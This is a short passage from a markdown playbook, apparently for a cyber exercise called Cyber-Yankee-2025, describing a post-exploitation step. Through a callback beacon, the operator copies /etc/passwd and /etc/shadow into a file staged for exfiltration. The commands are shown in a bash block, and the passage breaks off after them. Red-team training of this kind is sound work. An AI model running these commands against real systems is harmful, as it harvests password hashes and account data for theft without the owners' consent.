Infinit3i/Cyber-Yankee-2025/fullflow.md

 1. We’ll start by viewing some important files and saving them to a new document for exfiltration:

+`UTILIZING THE CALL BACK BEACON- NOT THE EXPLOIT SHELL`

 ```bash
 cat /etc/passwd > users.txt
 cat /etc/shadow >> users.txt  # Notice the '>>', it appends the content of /etc/shadow